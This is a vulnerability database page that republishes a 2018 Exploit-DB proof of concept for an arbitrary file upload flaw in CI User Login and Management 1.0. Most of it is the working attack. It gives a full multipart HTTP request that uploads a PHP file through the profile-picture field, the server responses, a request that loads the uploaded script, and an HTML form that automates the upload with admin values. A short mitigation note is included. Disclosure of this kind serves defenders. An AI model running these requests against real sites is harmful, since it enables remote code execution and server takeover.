header-logo
Suggest Exploit
vendor:
CI User Login and Management
by:
Ihsan Sencan
7.5
CVSS
HIGH
Arbitrary File Upload
CWE
Product Name: CI User Login and Management
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 64-bit and Kali Linux 64-bit
2018

CI User Login and Management 1.0 – Arbitrary File Upload

The CI User Login and Management 1.0 software allows an attacker to upload arbitrary files to the server. This can lead to remote code execution and other unauthorized activities.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users should restrict access to the vulnerable software and apply other security measures like input validation and file type restrictions.
Source

Exploit-DB raw data:

# Exploit Title: CI User Login and Management 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage 1: http://www.webprojectbuilder.com/item/user-login-and-management
# Vendor Homepage 2: https://sourceforge.net/projects/user-management-system/
# Software Link 1: https://kent.dl.sourceforge.net/project/php-user-login-management/PHP_CI_user_login_and_management-1.zip
# Software Link 2: https://netix.dl.sourceforge.net/project/user-management-system/PHP_CI_user_login_and_management-1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/user/add_edit
# 
# http://localhost/[PATH]/assets/images/[FILE]
# 
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
212160558019833203481522967977
Content-Length: 727
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="fileOld"
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="users_id"
1
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="user_type"
admin
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="submit1"
-----------------------------212160558019833203481522967977--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:36:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: ci_session=599e598042864923e909b54019831db9d06c116f; expires=Tue, 30-Oct-2018 08:36:42 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

GET /[PATH]/assets/images/phpinfo_1540881402.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=599e598042864923e909b54019831db9d06c116f
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:37:08 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/user/add_edit
# 
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit" ">Ver Ayari</button>  
</form>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR